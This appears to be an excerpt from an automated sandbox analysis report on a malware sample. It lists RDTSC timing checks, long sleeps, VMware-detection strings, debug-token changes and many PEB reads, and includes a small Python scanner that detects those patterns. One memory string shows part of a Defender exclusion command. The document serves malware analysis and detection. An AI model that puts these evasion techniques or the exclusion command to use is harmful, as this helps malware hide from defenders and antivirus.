Source: C:\Users\user\Desktop\divpCHa0h7.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\divpCHa0h7.exe RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe RDTSC instruction interceptor: First address: 0000000002768614 second address: 000000000276861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe RDTSC instruction interceptor: First address: 00000000027689AE second address: 00000000027689B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
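Added analyst example, not from the report: a static scan for the instruction sequence the RDTSC interceptor recorded above (two rdtsc opcodes, 0F 31, six bytes apart with xor ecx, ecx and add ecx, eax between them). A byte-pattern check of this kind finds the pairs without executing the sample, which is how a YARA rule would express the same signature. The scanner goes beyond this one signature and also matches the "mov r32, dword ptr fs:[00000030h]" PEB reads the report lists further down, since both are the same class of anti-analysis check. The test image is constructed, not the real binary: NOP filler with the reported sequence placed at the offsets the report gives for process 5; the 16-byte pairing window and the PEB-read offset are assumptions.

```python
import re

# Opcode patterns (32-bit x86) for the two checks the report attributes to the
# sample: back-to-back rdtsc reads and PEB reads through fs:[30h].
#   rdtsc                 0F 31
#   mov eax, fs:[30h]     64 A1 30 00 00 00
#   mov r32, fs:[30h]     64 8B /r   (mod=00, rm=101 -> 05,0D,15,1D,25,2D,35,3D)
RDTSC_PAIR = re.compile(rb"\x0f\x31.{0,16}?\x0f\x31", re.DOTALL)   # 16-byte window: assumption
PEB_READ = re.compile(
    rb"\x64(?:\xa1|\x8b[\x05\x0d\x15\x1d\x25\x2d\x35\x3d])\x30\x00\x00\x00", re.DOTALL)

def find_rdtsc_pairs(image, base):
    """(first rdtsc VA, second rdtsc VA, distance) for rdtsc pairs within 16 bytes."""
    out = []
    for m in RDTSC_PAIR.finditer(image):
        first, second = base + m.start(), base + m.end() - 2
        out.append((first, second, second - first))
    return out

def find_peb_reads(image, base):
    """VAs of every 'mov r32, fs:[30h]' (PEB pointer, e.g. for BeingDebugged)."""
    return [base + m.start() for m in PEB_READ.finditer(image)]

# Constructed test image (NOT the real binary): NOP filler with the exact
# sequence from the report (rdtsc; xor ecx,ecx; add ecx,eax; rdtsc) placed at
# the two offsets it lists for process 5 (0x8614 and 0x89AE from base 0x400000)
# and one PEB read placed at an arbitrary offset of my choosing.
RDTSC_CHECK = bytes.fromhex("0f31 31c9 01c1 0f31")
PEB_CHECK = bytes.fromhex("64a1 30000000")
SAMPLE_BASE = 0x400000

def build_sample_image():
    buf = bytearray(b"\x90" * 0x10000)
    buf[0x8614:0x8614 + len(RDTSC_CHECK)] = RDTSC_CHECK
    buf[0x89AE:0x89AE + len(RDTSC_CHECK)] = RDTSC_CHECK
    buf[0x9000:0x9000 + len(PEB_CHECK)] = PEB_CHECK
    return bytes(buf)

if __name__ == "__main__":
    img = build_sample_image()
    for first, second, gap in find_rdtsc_pairs(img, SAMPLE_BASE):
        print(f"rdtsc pair at {first:#010x} / {second:#010x} ({gap} bytes apart)")
    for va in find_peb_reads(img, SAMPLE_BASE):
        print(f"fs:[30h] read at {va:#010x}")
```

The dynamic form of this check is the difference between the two rdtsc values: on real hardware two adjacent reads are a few dozen cycles apart, while under single-stepping, API hooking or an emulator the gap grows by orders of magnitude, which is why the sandbox intercepts the instruction rather than letting it through. A rdtsc pair is a weak indicator on its own (timing libraries and benchmarks emit the same opcodes), so it is read together with the other evasion signatures in this section.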
Source: C:\Users\user\Desktop\divpCHa0h7.exe TID: 2540 Thread sleep time: -30091s >= -30000s
Source: C:\Users\user\Desktop\divpCHa0h7.exe TID: 2840 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 5240 Thread sleep time: -35000s >= -30000s
Source: C:\Windows\SysWOW64\msdt.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_004088E0 rdtsc 5_2_004088E0
Source: C:\Users\user\Desktop\divpCHa0h7.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\divpCHa0h7.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe Thread delayed: delay time: 30091
Source: C:\Users\user\Desktop\divpCHa0h7.exe Thread delayed: delay time: 922337203685477
Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 00000006.00000000.294005311.000000000891C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000006.00000000.294005311.000000000891C000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000006.00000000.304751449.0000000003767000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000006.00000000.301545484.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000006.00000000.294080069.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000006.00000000.305488010.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000006.00000000.294080069.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_004088E0 rdtsc 5_2_004088E0
Source: C:\Users\user\Desktop\divpCHa0h7.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\divpCHa0h7.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00FAB8D0 mov eax, dword ptr fs:[00000030h] 5_2_00FAB8D0
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00FAB8D0 mov ecx, dword ptr fs:[00000030h] 5_2_00FAB8D0
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00FAB8D0 mov eax, dword ptr fs:[00000030h] 5_2_00FAB8D0
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00FAB8D0 mov eax, dword ptr fs:[00000030h] 5_2_00FAB8D0
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00FAB8D0 mov eax, dword ptr fs:[00000030h] 5_2_00FAB8D0
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00FAB8D0 mov eax, dword ptr fs:[00000030h] 5_2_00FAB8D0
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F4F0BF mov ecx, dword ptr fs:[00000030h] 5_2_00F4F0BF
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F4F0BF mov eax, dword ptr fs:[00000030h] 5_2_00F4F0BF
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F4F0BF mov eax, dword ptr fs:[00000030h] 5_2_00F4F0BF
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F590AF mov eax, dword ptr fs:[00000030h] 5_2_00F590AF
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F19080 mov eax, dword ptr fs:[00000030h] 5_2_00F19080
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F93884 mov eax, dword ptr fs:[00000030h] 5_2_00F93884
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F93884 mov eax, dword ptr fs:[00000030h] 5_2_00F93884
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00FE1074 mov eax, dword ptr fs:[00000030h] 5_2_00FE1074
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00FD2073 mov eax, dword ptr fs:[00000030h] 5_2_00FD2073
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F30050 mov eax, dword ptr fs:[00000030h] 5_2_00F30050
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F30050 mov eax, dword ptr fs:[00000030h] 5_2_00F30050
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F2B02A mov eax, dword ptr fs:[00000030h] 5_2_00F2B02A
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F2B02A mov eax, dword ptr fs:[00000030h] 5_2_00F2B02A
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F2B02A mov eax, dword ptr fs:[00000030h] 5_2_00F2B02A
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F2B02A mov eax, dword ptr fs:[00000030h] 5_2_00F2B02A
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F4002D mov eax, dword ptr fs:[00000030h] 5_2_00F4002D
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F4002D mov eax, dword ptr fs:[00000030h] 5_2_00F4002D
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F4002D mov eax, dword ptr fs:[00000030h] 5_2_00F4002D
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F4002D mov eax, dword ptr fs:[00000030h] 5_2_00F4002D
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F4002D mov eax, dword ptr fs:[00000030h] 5_2_00F4002D
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00FE4015 mov eax, dword ptr fs:[00000030h] 5_2_00FE4015
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00FE4015 mov eax, dword ptr fs:[00000030h] 5_2_00FE4015
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F97016 mov eax, dword ptr fs:[00000030h] 5_2_00F97016
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F97016 mov eax, dword ptr fs:[00000030h] 5_2_00F97016
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F97016 mov eax, dword ptr fs:[00000030h] 5_2_00F97016
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F1B1E1 mov eax, dword ptr fs:[00000030h] 5_2_00F1B1E1
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F1B1E1 mov eax, dword ptr fs:[00000030h] 5_2_00F1B1E1
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F1B1E1 mov eax, dword ptr fs:[00000030h] 5_2_00F1B1E1
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00FA41E8 mov eax, dword ptr fs:[00000030h] 5_2_00FA41E8
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F461A0 mov eax, dword ptr fs:[00000030h] 5_2_00F461A0
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F461A0 mov eax, dword ptr fs:[00000030h] 5_2_00F461A0
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F969A6 mov eax, dword ptr fs:[00000030h] 5_2_00F969A6
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F4A185 mov eax, dword ptr fs:[00000030h] 5_2_00F4A185
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F3C182 mov eax, dword ptr fs:[00000030h] 5_2_00F3C182
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F1B171 mov eax, dword ptr fs:[00000030h] 5_2_00F1B171
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F1B171 mov eax, dword ptr fs:[00000030h] 5_2_00F1B171
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F1C962 mov eax, dword ptr fs:[00000030h] 5_2_00F1C962
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F3B944 mov eax, dword ptr fs:[00000030h] 5_2_00F3B944
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F3B944 mov eax, dword ptr fs:[00000030h] 5_2_00F3B944
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F4513A mov eax, dword ptr fs:[00000030h] 5_2_00F4513A
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F4513A mov eax, dword ptr fs:[00000030h] 5_2_00F4513A
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F34120 mov eax, dword ptr fs:[00000030h] 5_2_00F34120
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F34120 mov eax, dword ptr fs:[00000030h] 5_2_00F34120
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F34120 mov eax, dword ptr fs:[00000030h] 5_2_00F34120
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F34120 mov eax, dword ptr fs:[00000030h] 5_2_00F34120
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F34120 mov ecx, dword ptr fs:[00000030h] 5_2_00F34120
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F19100 mov eax, dword ptr fs:[00000030h] 5_2_00F19100
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F19100 mov eax, dword ptr fs:[00000030h] 5_2_00F19100
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F19100 mov eax, dword ptr fs:[00000030h] 5_2_00F19100
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F42AE4 mov eax, dword ptr fs:[00000030h] 5_2_00F42AE4
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F42ACB mov eax, dword ptr fs:[00000030h] 5_2_00F42ACB
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F2AAB0 mov eax, dword ptr fs:[00000030h] 5_2_00F2AAB0
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F2AAB0 mov eax, dword ptr fs:[00000030h] 5_2_00F2AAB0
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F4FAB0 mov eax, dword ptr fs:[00000030h] 5_2_00F4FAB0
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F152A5 mov eax, dword ptr fs:[00000030h] 5_2_00F152A5
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F152A5 mov eax, dword ptr fs:[00000030h] 5_2_00F152A5
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F152A5 mov eax, dword ptr fs:[00000030h] 5_2_00F152A5
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F152A5 mov eax, dword ptr fs:[00000030h] 5_2_00F152A5
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F152A5 mov eax, dword ptr fs:[00000030h] 5_2_00F152A5
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F4D294 mov eax, dword ptr fs:[00000030h] 5_2_00F4D294
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F4D294 mov eax, dword ptr fs:[00000030h] 5_2_00F4D294
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F5927A mov eax, dword ptr fs:[00000030h] 5_2_00F5927A
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00FCB260 mov eax, dword ptr fs:[00000030h] 5_2_00FCB260
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00FCB260 mov eax, dword ptr fs:[00000030h] 5_2_00FCB260
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00FE8A62 mov eax, dword ptr fs:[00000030h] 5_2_00FE8A62
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00FA4257 mov eax, dword ptr fs:[00000030h] 5_2_00FA4257
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F19240 mov eax, dword ptr fs:[00000030h]5_2_00F19240
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F19240 mov eax, dword ptr fs:[00000030h]5_2_00F19240
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F19240 mov eax, dword ptr fs:[00000030h]5_2_00F19240
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F19240 mov eax, dword ptr fs:[00000030h]5_2_00F19240
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1AA16 mov eax, dword ptr fs:[00000030h]5_2_00F1AA16
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1AA16 mov eax, dword ptr fs:[00000030h]5_2_00F1AA16
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F33A1C mov eax, dword ptr fs:[00000030h]5_2_00F33A1C
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F28A0A mov eax, dword ptr fs:[00000030h]5_2_00F28A0A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]5_2_00F403E2
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]5_2_00F403E2
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]5_2_00F403E2
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]5_2_00F403E2
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]5_2_00F403E2
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]5_2_00F403E2
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F953CA mov eax, dword ptr fs:[00000030h]5_2_00F953CA
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F953CA mov eax, dword ptr fs:[00000030h]5_2_00F953CA
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE5BA5 mov eax, dword ptr fs:[00000030h]5_2_00FE5BA5
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4B390 mov eax, dword ptr fs:[00000030h]5_2_00F4B390
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD138A mov eax, dword ptr fs:[00000030h]5_2_00FD138A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FCD380 mov ecx, dword ptr fs:[00000030h]5_2_00FCD380
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F21B8F mov eax, dword ptr fs:[00000030h]5_2_00F21B8F
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F21B8F mov eax, dword ptr fs:[00000030h]5_2_00F21B8F
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F43B7A mov eax, dword ptr fs:[00000030h]5_2_00F43B7A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F43B7A mov eax, dword ptr fs:[00000030h]5_2_00F43B7A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1DB60 mov ecx, dword ptr fs:[00000030h]5_2_00F1DB60
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE8B58 mov eax, dword ptr fs:[00000030h]5_2_00FE8B58
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1F358 mov eax, dword ptr fs:[00000030h]5_2_00F1F358
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1DB40 mov eax, dword ptr fs:[00000030h]5_2_00F1DB40
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD131B mov eax, dword ptr fs:[00000030h]5_2_00FD131B
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD14FB mov eax, dword ptr fs:[00000030h]5_2_00FD14FB
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F96CF0 mov eax, dword ptr fs:[00000030h]5_2_00F96CF0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F96CF0 mov eax, dword ptr fs:[00000030h]5_2_00F96CF0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F96CF0 mov eax, dword ptr fs:[00000030h]5_2_00F96CF0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE8CD6 mov eax, dword ptr fs:[00000030h]5_2_00FE8CD6
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2849B mov eax, dword ptr fs:[00000030h]5_2_00F2849B
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F3746D mov eax, dword ptr fs:[00000030h]5_2_00F3746D
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FAC450 mov eax, dword ptr fs:[00000030h]5_2_00FAC450
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FAC450 mov eax, dword ptr fs:[00000030h]5_2_00FAC450
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4A44B mov eax, dword ptr fs:[00000030h]5_2_00F4A44B
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4BC2C mov eax, dword ptr fs:[00000030h]5_2_00F4BC2C
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE740D mov eax, dword ptr fs:[00000030h]5_2_00FE740D
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE740D mov eax, dword ptr fs:[00000030h]5_2_00FE740D
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE740D mov eax, dword ptr fs:[00000030h]5_2_00FE740D
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F96C0A mov eax, dword ptr fs:[00000030h]5_2_00F96C0A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F96C0A mov eax, dword ptr fs:[00000030h]5_2_00F96C0A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F96C0A mov eax, dword ptr fs:[00000030h]5_2_00F96C0A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F96C0A mov eax, dword ptr fs:[00000030h]5_2_00F96C0A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FC8DF1 mov eax, dword ptr fs:[00000030h]5_2_00FC8DF1
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2D5E0 mov eax, dword ptr fs:[00000030h]5_2_00F2D5E0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2D5E0 mov eax, dword ptr fs:[00000030h]5_2_00F2D5E0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F41DB5 mov eax, dword ptr fs:[00000030h]5_2_00F41DB5
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F41DB5 mov eax, dword ptr fs:[00000030h]5_2_00F41DB5
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F41DB5 mov eax, dword ptr fs:[00000030h]5_2_00F41DB5
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F435A1 mov eax, dword ptr fs:[00000030h]5_2_00F435A1
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4FD9B mov eax, dword ptr fs:[00000030h]5_2_00F4FD9B
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4FD9B mov eax, dword ptr fs:[00000030h]5_2_00F4FD9B
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F12D8A mov eax, dword ptr fs:[00000030h]5_2_00F12D8A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F12D8A mov eax, dword ptr fs:[00000030h]5_2_00F12D8A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F12D8A mov eax, dword ptr fs:[00000030h]5_2_00F12D8A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F12D8A mov eax, dword ptr fs:[00000030h]5_2_00F12D8A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F12D8A mov eax, dword ptr fs:[00000030h]5_2_00F12D8A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F3C577 mov eax, dword ptr fs:[00000030h]5_2_00F3C577
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F3C577 mov eax, dword ptr fs:[00000030h]5_2_00F3C577
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F37D50 mov eax, dword ptr fs:[00000030h]5_2_00F37D50
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F53D43 mov eax, dword ptr fs:[00000030h]5_2_00F53D43
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F93540 mov eax, dword ptr fs:[00000030h]5_2_00F93540
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1AD30 mov eax, dword ptr fs:[00000030h]5_2_00F1AD30
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
